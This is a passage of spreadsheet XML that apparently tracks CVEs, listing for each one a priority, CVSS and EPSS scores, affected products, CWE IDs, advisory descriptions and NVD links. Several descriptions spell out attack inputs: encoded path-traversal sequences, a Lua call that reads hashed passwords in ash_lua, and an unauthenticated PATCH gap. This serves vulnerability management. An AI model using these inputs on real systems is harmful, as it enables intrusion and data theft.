        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B575" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69906</t>
        </is>
      </c>
      <c r="C575" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D575" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E575" s="5" t="inlineStr"/>
      <c r="F575" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G575" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H575" s="5" t="inlineStr"/>
      <c r="I575" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J575" s="5" t="inlineStr"/>
      <c r="K575" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L575" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M575" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69906</t>
        </is>
      </c>
    </row>
    <row r="576">
      <c r="A576" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B576" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72958</t>
        </is>
      </c>
      <c r="C576" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D576" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E576" s="5" t="inlineStr"/>
      <c r="F576" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G576" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H576" s="5" t="inlineStr"/>
      <c r="I576" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J576" s="5" t="inlineStr"/>
      <c r="K576" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L576" s="5" t="inlineStr">
        <is>
          <t>Double free in Windows Credential Guard allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M576" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72958</t>
        </is>
      </c>
    </row>
    <row r="577">
      <c r="A577" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B577" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72961</t>
        </is>
      </c>
      <c r="C577" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D577" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E577" s="5" t="inlineStr"/>
      <c r="F577" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G577" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H577" s="5" t="inlineStr"/>
      <c r="I577" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J577" s="5" t="inlineStr"/>
      <c r="K577" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L577" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Hyper-V allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M577" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72961</t>
        </is>
      </c>
    </row>
    <row r="578">
      <c r="A578" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B578" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72962</t>
        </is>
      </c>
      <c r="C578" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D578" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E578" s="5" t="inlineStr"/>
      <c r="F578" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G578" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H578" s="5" t="inlineStr"/>
      <c r="I578" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J578" s="5" t="inlineStr"/>
      <c r="K578" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L578" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M578" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72962</t>
        </is>
      </c>
    </row>
    <row r="579">
      <c r="A579" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B579" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73214</t>
        </is>
      </c>
      <c r="C579" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D579" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E579" s="5" t="inlineStr"/>
      <c r="F579" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G579" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="H579" s="5" t="inlineStr"/>
      <c r="I579" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J579" s="5" t="inlineStr"/>
      <c r="K579" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L579" s="5" t="inlineStr">
        <is>
          <t>Coturn is a free open source implementation of TURN and STUN Server. Prior to 4.16.0, dtls_server_input_handler() and create_new_connected_udp_socket() in src/apps/relay/dtls_listener.c retain OpenSSL dtls1_reassemble_fragment() state for a 35-byte fragmented ClientHello declaring a 650,000-byte handshake before cookie validation, allowing an unauthenticated remote sender using fresh UDP tuples to exhaust memory without TURN credentials, a completed handshake, a valid cookie, or source spoofing. This issue is fixed in version 4.16.0.</t>
        </is>
      </c>
      <c r="M579" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73214</t>
        </is>
      </c>
    </row>
    <row r="580">
      <c r="A580" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B580" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73658</t>
        </is>
      </c>
      <c r="C580" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D580" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E580" s="5" t="inlineStr"/>
      <c r="F580" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G580" s="5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="H580" s="5" t="inlineStr"/>
      <c r="I580" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J580" s="5" t="inlineStr"/>
      <c r="K580" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-22, CWE-862</t>
        </is>
      </c>
      <c r="L580" s="5" t="inlineStr">
        <is>
          <t>Trigger.dev is a platform for building and deploying fully managed AI agents and workflows. From 4.4.2 until 4.5.0-rc.5, Aws4FetchClient.buildUrl() and Aws4FetchClient.presign() in apps/webapp/app/v3/objectStoreClient.server.ts assign user-controlled packet keys to URL.pathname, while apps/webapp/app/routes/api.v1.packets.$.ts accepts params["*"] without rejecting dot segments and uses findResource: async () =&gt; 1 without per-resource ownership validation. WHATWG path normalization collapses .. segments before signing, allowing a caller with a valid environment API key to obtain presigned URLs for another tenant's object-store keys and read or overwrite task payloads. This issue is fixed in version 4.5.0-rc.5.</t>
        </is>
      </c>
      <c r="M580" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73658</t>
        </is>
      </c>
    </row>
    <row r="581">
      <c r="A581" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B581" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73666</t>
        </is>
      </c>
      <c r="C581" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D581" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E581" s="5" t="inlineStr"/>
      <c r="F581" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G581" s="5" t="inlineStr">
        <is>
          <t>kubernetes</t>
        </is>
      </c>
      <c r="H581" s="5" t="inlineStr"/>
      <c r="I581" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J581" s="5" t="inlineStr"/>
      <c r="K581" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L581" s="5" t="inlineStr">
        <is>
          <t>OpenChoreo is a developer platform for Kubernetes. Prior to 1.0.4, 1.1.4, and 1.2.1, the OpenChoreo Backstage backend hardcoded backend.auth.dangerouslyDisableDefaultAuthPolicy and auth.providers.guest.dangerouslyAllowOutsideDevelopment to true, exposing /api/* without authentication and allowing unauthenticated catalog reads, scaffolder log reads, and catalog location creation or deletion. This issue is fixed in versions 1.0.4, 1.1.4, and 1.2.1.</t>
        </is>
      </c>
      <c r="M581" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73666</t>
        </is>
      </c>
    </row>
    <row r="582">
      <c r="A582" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B582" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75594</t>
        </is>
      </c>
      <c r="C582" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D582" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E582" s="5" t="inlineStr"/>
      <c r="F582" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G582" s="5" t="inlineStr">
        <is>
          <t>apache, nginx</t>
        </is>
      </c>
      <c r="H582" s="5" t="inlineStr"/>
      <c r="I582" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J582" s="5" t="inlineStr"/>
      <c r="K582" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L582" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. Prior to 4.9.5 and 5.5.2, depending on the release line, Kirby's media handler in src/Cms/Media.php allowed Kirby\Cms\Media::thumb() to append a path-bearing filename to a validated parent media directory. On nginx, PHP's built-in server, or Apache with AllowEncodedSlashes enabled, a remote attacker could submit encoded slash characters such as %2f in the filename and traverse outside the parent's media directory. Differences between responses for existing and nonexistent thumbnail configurations disclosed whether an arbitrary .json file existed, and a .json file containing a valid filename key could cause the referenced image to be returned and the job file to be deleted. The related file::version path in src/Filesystem/Asset.php also accepted ../ sequences outside the intended index root. This issue is fixed in versions 4.9.5 and 5.5.2.</t>
        </is>
      </c>
      <c r="M582" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75594</t>
        </is>
      </c>
    </row>
    <row r="583">
      <c r="A583" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B583" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77822</t>
        </is>
      </c>
      <c r="C583" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D583" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E583" s="5" t="inlineStr"/>
      <c r="F583" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G583" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H583" s="5" t="inlineStr"/>
      <c r="I583" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J583" s="5" t="inlineStr"/>
      <c r="K583" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L583" s="5" t="inlineStr">
        <is>
          <t>IBM ContextForge MCP Gateway could allow a remote authenticated attacker to obtain sensitive information due to server-side request forgery via DNS rebinding.</t>
        </is>
      </c>
      <c r="M583" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77822</t>
        </is>
      </c>
    </row>
    <row r="584">
      <c r="A584" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B584" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81354</t>
        </is>
      </c>
      <c r="C584" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D584" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E584" s="5" t="inlineStr"/>
      <c r="F584" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G584" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H584" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2019</t>
        </is>
      </c>
      <c r="I584" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J584" s="5" t="inlineStr"/>
      <c r="K584" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L584" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M584" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81354</t>
        </is>
      </c>
    </row>
    <row r="585">
      <c r="A585" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B585" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82586</t>
        </is>
      </c>
      <c r="C585" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D585" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E585" s="5" t="inlineStr"/>
      <c r="F585" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G585" s="5" t="inlineStr">
        <is>
          <t>oracle</t>
        </is>
      </c>
      <c r="H585" s="5" t="inlineStr"/>
      <c r="I585" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J585" s="5" t="inlineStr"/>
      <c r="K585" s="5" t="inlineStr">
        <is>
          <t>CWE-424</t>
        </is>
      </c>
      <c r="L585" s="5" t="inlineStr">
        <is>
          <t>Improper Protection of Alternate Path vulnerability in ash-project ash_lua allows a user-supplied Lua script to read attributes that are not on the exposed-field allow-list.
AshLua exposes Ash resources to Lua scripts, gated by a manifest declaring which fields are exposed. The read action's operation aggregate path in AshLua.Runtime took the field name straight from the Lua call and resolved it with only String.to_existing_atom and Ash.Query.Aggregate.new!, neither of which consults the exposed-field allow-list the normal fields path enforces. A script can therefore read the value of any attribute of any record the actor may read, including private sensitive?: true columns, via resource.read({ operation = {"list", "hashed_password"} }); min and max give a value oracle. Anyone able to submit or influence a Lua script can reach this.
This issue affects ash_lua: from 0.1.0 before 0.2.1.</t>
        </is>
      </c>
      <c r="M585" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82586</t>
        </is>
      </c>
    </row>
    <row r="586">
      <c r="A586" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B586" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83939</t>
        </is>
      </c>
      <c r="C586" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D586" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E586" s="5" t="inlineStr"/>
      <c r="F586" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G586" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H586" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_26h1</t>
        </is>
      </c>
      <c r="I586" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J586" s="5" t="inlineStr"/>
      <c r="K586" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="L586" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Secure Kernel Mode allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83939</t>
        </is>
      </c>
    </row>
    <row r="587">
      <c r="A587" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B587" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="C587" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D587" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E587" s="5" t="inlineStr"/>
      <c r="F587" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G587" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H587" s="5" t="inlineStr"/>
      <c r="I587" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J587" s="5" t="inlineStr"/>
      <c r="K587" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="L587" s="5" t="inlineStr">
        <is>
          <t>SVGO, short for SVG Optimizer, is a Node.js library and command-line application for optimizing SVG files. From version 1.0.0 until versions 2.8.4, 3.3.5, and 4.1.0, the opt-in removeScripts plugin, named removeScriptElement in versions 2 and 3, incompletely filters executable links in plugins/removeScripts.js and lib/svgo/tools.js. The plugin does not recognize namespace-prefixed SVG anchor elements such as svg:a with href or namespaced *:href values, and it does not remove ASCII tab, line-feed, or carriage-return characters before checking URL schemes. Browsers remove those characters before parsing a scheme, allowing an executable link to pass the plugin's check. When an application processes attacker-controlled SVG input and serves the result in an active browser context, a victim who activates the surviving link can execute script in the SVG's origin, expose data, modify content, or perform actions as the victim. This issue is fixed in versions 2.8.4, 3.3.5, and 4.1.0.</t>
        </is>
      </c>
      <c r="M587" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="588">
      <c r="A588" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B588" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85596</t>
        </is>
      </c>
      <c r="C588" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D588" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E588" s="5" t="inlineStr"/>
      <c r="F588" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G588" s="5" t="inlineStr">
        <is>
          <t>nginx, kubernetes</t>
        </is>
      </c>
      <c r="H588" s="5" t="inlineStr"/>
      <c r="I588" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J588" s="5" t="inlineStr"/>
      <c r="K588" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="L588" s="5" t="inlineStr">
        <is>
          <t>Traefik versions &gt;= v3.7.0 and &lt;= v3.7.10 contain an authentication bypass in the Kubernetes Ingress NGINX provider. The TLS option generated for an Ingress carrying the nginx.ingress.kubernetes.io/auth-tls-secret annotation was named after the Ingress namespace and name. As a result, two Ingress objects sharing the same host, the same client CA secret, and the same client-authentication mode produced two distinct TLS option names for that host. Traefik treats this as a TLS options conflict and falls back to the entry point's default TLS configuration, which does not request a client certificate, so a route configured with nginx.ingress.kubernetes.io/auth-tls-verify-client: "on" becomes reachable without a client certificate. Only the v3.7 line is affected; the issue is fixed in v3.7.11.</t>
        </is>
      </c>
      <c r="M588" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85596</t>
        </is>
      </c>
    </row>
    <row r="589">
      <c r="A589" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B589" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86253</t>
        </is>
      </c>
      <c r="C589" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D589" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E589" s="5" t="inlineStr"/>
      <c r="F589" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G589" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H589" s="5" t="inlineStr"/>
      <c r="I589" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J589" s="5" t="inlineStr"/>
      <c r="K589" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L589" s="5" t="inlineStr">
        <is>
          <t>h3 (npm package) versions &lt;= 2.0.1-rc.14 contain a path traversal vulnerability in serveStatic(). On Node.js deployments, event.url.pathname is not normalized, so percent-encoded dot segments (%2e%2e) are passed to decodeURI() and decoded to ../ sequences without sanitization. An unauthenticated remote attacker can send crafted requests to endpoints served by serveStatic() to read arbitrary files outside the intended static directory. Fixed in 1.15.6 and 2.0.1-rc.15.</t>
        </is>
      </c>
      <c r="M589" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86253</t>
        </is>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B590" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86600</t>
        </is>
      </c>
      <c r="C590" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D590" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E590" s="5" t="inlineStr"/>
      <c r="F590" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G590" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H590" s="5" t="inlineStr"/>
      <c r="I590" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J590" s="5" t="inlineStr"/>
      <c r="K590" s="5" t="inlineStr">
        <is>
          <t>CWE-441, CWE-522</t>
        </is>
      </c>
      <c r="L590" s="5" t="inlineStr">
        <is>
          <t>In affected Snowflake drivers, WORKLOAD_IDENTITY authentication requests a cloud workload-identity token and attaches it to the login request without verifying that the configured host is a Snowflake endpoint. An attacker who can modify the connection configuration can cause the driver to mint a fresh attestation and send it to a host they control. The captured token can be replayed to Snowflake for its remaining lifetime in accounts where that workload identity is already registered. On Azure, the token audience is also taken from connection configuration. Combined with an attacker-controlled host, the driver can request a Managed Identity access token scoped to a non-Snowflake Azure resource and deliver it to the attacker. That path is the only case in which impact extends beyond Snowflake; it is bounded by the token lifetime and the managed identity’s permissions. Successful exploitation requires WORKLOAD_IDENTITY authentication on a workload that already has an ambient cloud identity. Patched driver versions restrict this authenticator to recognized Snowflake hosts. Users must manually upgrade.</t>
        </is>
      </c>
      <c r="M590" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86600</t>
        </is>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B591" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88032</t>
        </is>
      </c>
      <c r="C591" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D591" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E591" s="5" t="inlineStr"/>
      <c r="F591" s="5" t="inlineStr"/>
      <c r="G591" s="5" t="inlineStr">
        <is>
          <t>java, mongodb</t>
        </is>
      </c>
      <c r="H591" s="5" t="inlineStr"/>
      <c r="I591" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J591" s="5" t="inlineStr"/>
      <c r="K591" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L591" s="5" t="inlineStr">
        <is>
          <t>A use-after-free in the reactive client-side encryption component of the MongoDB Java Driver can cause native resources to be freed while an affected encrypted operation is still using them when the operation is cancelled. A party able to cause such an operation to be cancelled may cause the hosting application process to terminate. Reaching the issue requires an affected reactive encryption configuration that retrieves KMS credentials on demand.</t>
        </is>
      </c>
      <c r="M591" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88032</t>
        </is>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B592" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89054</t>
        </is>
      </c>
      <c r="C592" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="D592" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E592" s="5" t="inlineStr"/>
      <c r="F592" s="5" t="inlineStr"/>
      <c r="G592" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="H592" s="5" t="inlineStr"/>
      <c r="I592" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J592" s="5" t="inlineStr"/>
      <c r="K592" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L592" s="5" t="inlineStr">
        <is>
          <t>A missing authorization vulnerability in OpenNMS Horizon allows configuration changes without authentication. The Spring Security policy for the /api/v2 REST API defines authorization rules for every HTTP method except PATCH, so the shipped @PATCH configuration endpoints for event configuration and SNMP data collection (which enable and disable event definitions and data-collection sources) are reachable with no authorization enforced. An unauthenticated attacker able to reach the web UI can disable event definitions and SNMP data collection, suppressing event and alarm generation and stopping metric collection - silently degrading monitoring and detection - with the change persisted and reloaded into the running system.
The solution is to upgrade to Horizon 36.0.4 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.</t>
        </is>
      </c>
      <c r="M592" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89054</t>
        </is>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B593" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-18147</t>
        </is>
      </c>
      <c r="C593" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D593" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E593" s="5" t="inlineStr"/>
      <c r="F593" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G593" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H593" s="5" t="inlineStr"/>
      <c r="I593" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J593" s="5" t="inlineStr"/>
      <c r="K593" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L593" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in FreeIPA. An unauthenticated remote attacker could exploit a DOM Cross-Site Scripting (XSS) vulnerability in the FreeIPA/IdM Web UI password reset page. By enticing a victim to click a specially crafted link and complete a password reset, the attacker could inject and execute arbitrary JavaScript code. This allows the attacker to perform actions within the victim's authenticated session, potentially leading to full administrative control if an IdM administrator is targeted.</t>
        </is>
      </c>
      <c r="M593" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-18147</t>
        </is>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B594" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19303</t>
        </is>
      </c>
      <c r="C594" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="D594" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E594" s="5" t="inlineStr"/>
      <c r="F594" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G594" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H594" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I594" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J594" s="5" t="inlineStr"/>
      <c r="K594" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L594" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote authenticated attacker to delete arbitrary local files or directories due to improper limitation of a pathname to a restricted directory.</t>
        </is>
      </c>
      <c r="M594" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19303</t>
        </is>
      </c>
    </row>
    <row r="595">
